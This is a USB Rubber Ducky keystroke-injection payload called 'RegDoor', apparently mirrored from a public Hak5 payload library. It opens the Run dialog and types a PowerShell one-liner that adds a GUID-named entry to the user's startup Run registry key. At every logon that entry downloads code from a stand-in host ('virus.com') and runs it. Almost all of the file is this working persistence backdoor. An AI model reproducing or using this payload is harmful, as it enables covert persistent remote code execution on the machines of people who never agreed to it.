Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/RegDoor/payload.txt
2964 views
1
REM made by: unknown81311
2
GUI R
3
REM create registry sting var in the startup registry dir to website with a unique id for identifying.
4
STRING powershell -Command "`$x=New-Guid;sp Registry::HKCU\Sof*\Mic*\Win*\Cu*\Run -name(`$x)\`"iwr virus.com?`$x|iex\`""
5
ENTER
6
7